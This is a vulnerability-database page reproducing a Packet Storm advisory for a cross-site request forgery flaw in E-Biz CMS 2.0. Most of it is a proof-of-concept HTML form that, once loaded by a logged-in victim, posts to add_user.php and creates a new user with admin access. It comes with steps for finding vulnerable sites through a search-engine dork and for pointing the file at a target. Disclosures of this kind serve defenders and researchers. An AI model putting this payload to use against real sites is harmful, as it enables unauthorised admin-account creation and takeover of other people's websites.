Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormIndoushkaPACKETSTORM:174139
HistoryAug 14, 2023 - 12:00 a.m.

E-Biz CMS 2.0 Cross Site Request Forgery

2023-08-1400:00:00
indoushka
packetstormsecurity.com
143
cross site request forgery
softech
add user
JSON
`====================================================================================================================================  
| # Title : E-Biz CMS v2.0 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |   
| # Vendor : https://softech.pk/ |   
| # Dork : Copyright © 2019, Designed By SOFTECH |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] The following html code create a new admin .  
  
[+] Go to the line 17.  
  
[+] Set the target site link Save changes and apply .   
  
[+] infected file : /add_user.php.  
  
[+] http://127.0.0.1/q7.3/softpanel/add_user.php.  
  
[+] save code as poc.html .  
  
<h1>Add User</h1>  
</div>  
<!-- #contentHeader -->  
<div class="site">  
<div class="container">  
<div class="grid-16">  
  
<div class="widget" >  
<div class="widget-header"> <span class="icon-wrench"></span>  
<h3>Add User </h3>  
</div>  
<!-- .widget-header -->  
<div class="widget-content">  
<!-- .field-group -->  
<!-- .field-group -->  
<!-- .field-group -->  
<form action="http://aosccom/softpanel/add_user.php" method="post" enctype="multipart/form-data" name="" class="form uniformForm validateForm">  
<table width="650" border="0" align="center" cellpadding="0" cellspacing="0">  
<tr>  
<td width="527" align="left"><strong>Name : </strong></td>  
</tr>  
<tr>  
<td><input name="name" value="" class="validate[required]" type="text" id="name" size="50"></td>  
</tr>  
<tr>  
<td><strong>Email :</strong> </td>  
</tr>  
<tr>  
<td><span class="field">  
<input name="email" type="text" id="date" class="validate[required,custom[email]" size="50" />  
</span></td>  
</tr>  
<tr>  
<td><strong>Password :</strong></td>  
</tr>  
<tr>  
<td><div class="field">  
<input name="password" type="text" id="date_English" class="validate[required]" size="50" />   
</div> </td>  
</tr>  
<tr>  
<td><strong>Access : </strong></td>  
</tr>  
<tr>  
<td><select name="type" id="type" >  
<option value="user" selected="selected">User</option>  
<option value="admin">Admin</option>  
</select> </td>  
</tr>  
<tr id="link">  
<td><table width="100%" border="0" cellspacing="0" cellpadding="0">  
<tr>  
<td height="30"><strong id="">Privileges:</strong></td>  
</tr>  
<tr>  
<td align="center" valign="middle"><table width="400" border="0" align="center" cellpadding="0" cellspacing="0">  
  
<tr>  
<td width="54%" height="25" align="left"><table width="150" border="0" cellspacing="0" cellpadding="0">  
<tr>  
<td height="25"><label for="label">Company News</label></td>  
<td width="10"><input type="checkbox" id="new" name="news" value="Y" onClick="news.value=(this.checked)?'Y':'N'"></td>  
</tr> <tr>  
<td height="25">Home Banners</td>  
<td><input type="checkbox" id="ban" name="banners" value="Y" onClick="banners.value=(this.checked)?'Y':'N'" ></td>  
</tr> <tr>  
<td height="25">Gallery</td>  
<td><input type="checkbox" id="gal" name="gallery" value="Y" onClick="gallery.value=(this.checked)?'Y':'N'"></td>  
</tr> <tr>  
<td height="25"><label for="sim">Simple Gallery</label></td>  
<td><input type="checkbox" id="gallery" name="simple_gallery" value="Y" onClick="simple_gallery.value=(this.checked)?'Y':'N'"></td>  
</tr> <tr>  
<td height="25">Pages</td>  
<td><input name="pages" type="checkbox" id="pages"onClick="pages.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
</tr> <tr>  
<td height="25">Newsletter</td>  
<td><input name="newsletter" type="checkbox" id="newsletter"onClick="newsletter.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
</tr> <tr>  
<td height="25">Categories</td>  
<td><input name="categories" type="checkbox" id="categories" onClick="categories.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
</tr> </table> </td>  
</tr>  
  
</table> </td>  
</tr>  
</table></td>  
</tr>  
<tr>  
<td></td>  
</tr>  
<tr>  
<td></td>  
</tr>  
  
  
<tr>  
<td>&nbsp;</td>  
</tr>  
</table>  
</td>  
</tr>  
<tr>  
<td></td>  
</tr>  
<tr>  
<td>&nbsp;</td>  
</tr>  
<tr>  
<td></td>  
</tr>  
<tr>  
<td> </td>  
</tr>  
<tr>  
<td>&nbsp;</td>  
</tr>  
<tr>  
<td><button name="save"class="btn btn-primary"><span class="icon-move-alt2"></span>Save</button>  
  
<button type="reset" class="btn btn-primary"><span class="icon-move-horizontal-alt2"></span>Cancel</button></td>  
</tr>  
</table>  
</form>  
</div>  
  
Greetings to :=================================================================  
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |  
===============================================================================  
`
JSON